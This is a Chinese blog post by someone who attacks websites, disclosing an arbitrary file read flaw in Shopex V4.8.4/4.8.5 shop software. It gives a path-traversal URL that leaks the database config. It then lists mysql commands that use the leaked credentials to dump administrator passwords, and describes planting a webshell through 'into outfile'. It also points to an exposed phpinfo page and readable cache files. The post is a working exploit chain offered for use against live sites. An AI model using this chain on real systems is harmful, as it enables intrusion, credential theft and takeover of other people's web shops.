Shopex V4.8.4|V4.8.5下载任意文件漏洞
2011-03-28 08:25 狼人:-) 阅读(1312) 评论(1) 编辑 收藏 举报利用前提是程序所应用的数据库服务器而且要是可以外连的,这个很关键。
自己搞站时候遇见的站,网上找不到该版本的漏洞,自己拿回源码读了一下。
找到一个漏洞,还是发出来吧。
读取任意文件漏洞:
http://www.xx.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=. . /. . /config/config.php
复制代码可以连上数据库。
mysql -h1.1..1.1 -uuser -ppass
use yourbasename;
select * from sdb_operators;
得到管理员用户密码./shopadmin/ 登陆
后台拿shell请参照本博客《Shopex V4.8.4 V4.8.5 后台拿Shell 0Days》一文。
我测试的站,直接用into outfile 一个shell。
网上有个帖子,说可以爆物理路径,测试不可用。
如果install目录没删,下面这个可以看phpinfo
http://www.xx.com/install/svinfo.php?phpinfo=true
复制代码另外/home/cache/目录的文件,也是可以爆出来的。
声明:此博有部分内容为转载,版权归原作者所有~
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· SQL Server 2025 AI相关能力初探
· Linux系列:如何用 C#调用 C方法造成内存泄露
· AI与.NET技术实操系列(二):开始使用ML.NET
· 记一次.NET内存居高不下排查解决与启示
· 探究高空视频全景AR技术的实现原理
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· SQL Server 2025 AI相关能力初探
· AI编程工具终极对决:字节Trae VS Cursor,谁才是开发者新宠?
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南